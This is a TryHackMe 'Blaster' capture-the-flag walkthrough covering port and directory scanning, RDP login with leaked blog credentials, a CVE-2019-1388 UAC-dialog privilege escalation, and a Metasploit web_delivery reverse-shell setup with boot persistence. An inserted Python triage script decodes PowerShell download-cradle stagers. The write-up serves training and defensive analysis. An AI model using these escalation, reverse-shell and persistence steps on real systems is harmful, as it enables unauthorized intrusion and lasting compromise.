
【TryHackMe】Blaster:Walkthrough

Overview

This is a walkthrough of the TryHackMe room "Blaster".

Task2

Q1.How many ports are open on our target system?

Run a full port scan against the target.

$ nmap -Pn -T4 -sVC -A -p- 10.10.143.192 -oN nmap_result
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2025-01-22T13:07:57+00:00
|_ssl-date: 2025-01-22T13:08:01+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2025-01-21T13:00:38
|_Not valid after:  2025-07-23T13:00:38

The scan shows which ports are open: HTTP (IIS 10.0) on 80 and RDP on 3389.

A.2

Q2.what is the title of the page we discover when browsing to it?

Browse to port 80.

A.IIS Windows Server

Q3.What hidden directory do we discover?

Hint.This directory can be found on the wordlist 'directory-list-2.3-small.txt' which is located in /usr/share/wordlists/dirbuster on a default kali installation

Run a directory scan.

$ dirsearch -u http://10.10.143.192/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[08:11:32] 301 -  150B  - /retro  ->  http://10.10.143.192/retro/

A./retro

Q4.what potential username do we discover?

Browse to /retro.

A.wade

Q5.What possible password do we discover?

Hint.Check user comments on the blog

It is in a reply to the post titled "Ready Player One".

A.parzival

Q6.What are its contents?

Hint.I recommend using Remmina for this. You can install this with the command 'apt install remmina'.

Connect over RDP with the credentials found above.

$ xfreerdp /u:wade /p:'parzival' /v:10.10.143.192

The flag is in user.txt on the Desktop.

A.THM{HACK_PLAYER_ONE}

Task3

Q1.What CVE was it?

Hint.CVE-2019-1388

The hint gives it away: CVE-2019-1388.

A.CVE-2019-1388

Q2.What is the name of this executable?

Hint.Setting the trash aside doesn't clean it up, you have to take it out as well.

hhupd on the Desktop looks suspicious.

A.hhupd

Q4.What is the output of running this?

Escalate privileges by following the steps in the repository below.

Running hhupd from the Desktop brings up the UAC prompt; click "Show more details".

Click the "Show information about the publisher's certificate" link that appears.

The certificate dialog opens; click the "Issued by" link.

A browser window then opens.

Choose "Save as" to get to the dialog for picking a save location.

Enter the full path of cmd.exe in the address bar at the top of that dialog and run it; a command prompt opens with administrator privileges.

Check the current user with whoami.

A.nt authority\system

Q5.What are the contents?

The flag is in C:\Users\Administrator\Desktop\root.txt.

A.THM{COIN_OPERATED_EXPLOITATION}

Task4

Q2.Which target number is PSH?

Hint.show targets

Start Metasploit and select exploit/multi/script/web_delivery.

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must b
                                       e an address on the local machine or 0.0.0.0 to listen on all
                                        addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generat
                                       ed)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python

show targets lists the available targets.

msf6 exploit(multi/script/web_delivery) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Python
    1   PHP
    2   PSH
    3   Regsvr32
    4   pubprn
    5   SyncAppvPublishingServer
    6   PSH (Binary)
    7   Linux
    8   Mac OS X

A.2

Q6.What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots?

Hint.Check out this article: https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

Set the options for exploit/multi/script/web_delivery and choose windows/meterpreter/reverse_http as the payload.

msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(multi/script/web_delivery) > set SRVPORT 1234
SRVPORT => 1234
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http

Running the module prints the PowerShell stager to execute on the target.

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://10.6.55.144:8080
[*] Using URL: http://10.6.55.144:1234/rePDDv1mRwFZS
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [base64-encoded stager omitted]
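The stager above is a base64 blob behind powershell.exe -e. This added example (not from the walkthrough or Metasploit) decodes such a command line offline and scores it for download-cradle indicators; it uses a constructed sample command of the same shape with a placeholder URL rather than the page's payload.

```python
"""Decode and triage a PowerShell '-e' (EncodedCommand) one-liner.

Added example (not from the walkthrough or Metasploit). '-e' takes base64 of the
script encoded as UTF-16LE, so the command can be recovered offline and checked
for download-cradle indicators before anyone runs it. The sample command below
is constructed here, not copied from the walkthrough.
"""
import base64
import re
import shlex

# Indicators typical of a download-and-execute stager.
INDICATORS = {
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "downloadstring": re.compile(r"DownloadString", re.I),
}

def decode_encoded_command(cmdline):
    """Return (decoded script, outer flags) or raise ValueError if no -e/-enc."""
    args = shlex.split(cmdline)
    for i, a in enumerate(args):
        if a.lower() in ("-e", "-enc", "-encodedcommand") and i + 1 < len(args):
            script = base64.b64decode(args[i + 1]).decode("utf-16-le")
            return script, [x.lower() for x in args[1:i]]
    raise ValueError("no encoded command found")

def triage(cmdline):
    """Return the decoded script, matched indicators, and any URLs it contacts."""
    script, flags = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    if "-w" in flags and "hidden" in flags:  # hidden window is itself a signal
        hits.append("hidden_window")
    urls = re.findall(r"https?://[^\s'\")]+", script)
    return {"script": script, "indicators": hits, "urls": urls}

def encode_for_powershell(script):
    """Build a '-e' argument the way PowerShell expects (used only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample: a cradle of the same shape as web_delivery's stager, placeholder URL.
SAMPLE_SCRIPT = "IEX ((new-object Net.WebClient).DownloadString('http://192.0.2.10:8080/stage'))"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -e " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["script"])
    print("indicators:", result["indicators"], "urls:", result["urls"])
```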

Executing that PowerShell stager in the administrator command prompt opened earlier establishes a session.

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10.238.249    web_delivery - Delivering AMSI Bypass (1381 bytes)
[*] 10.10.238.249    web_delivery - Delivering Payload (3839 bytes)
[!] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Without a database connected that payload UUID tracking will not work!
[*] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Staging x86 payload (177244 bytes) ...
[!] http://10.6.55.144:1234 handling request from 10.10.238.249; (UUID: ia3ah4uo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.6.55.144:1234 -> 10.10.238.249:49746) at 2025-01-22 09:14:47 -0500

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ RETROWEB  10.6.55.144:1234 -> 10.10.238.2
                                                                     49:49746 (10.10.238.249)

This confirms the meterpreter connection, running as NT AUTHORITY\SYSTEM.

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

run persistence -X configures the payload to start automatically at boot. Note that in the output below the command was typed at the msf6 prompt rather than the meterpreter prompt, so Metasploit simply re-ran the web_delivery module; the persistence script has to be run from inside the meterpreter session.

msf6 exploit(multi/script/web_delivery) > run persistence -X
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started HTTP reverse handler on http://10.6.55.144:1234
[*] Using URL: http://10.6.55.144:8080/7TqzY2DOx
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [base64-encoded stager omitted]

A.run persistence -X
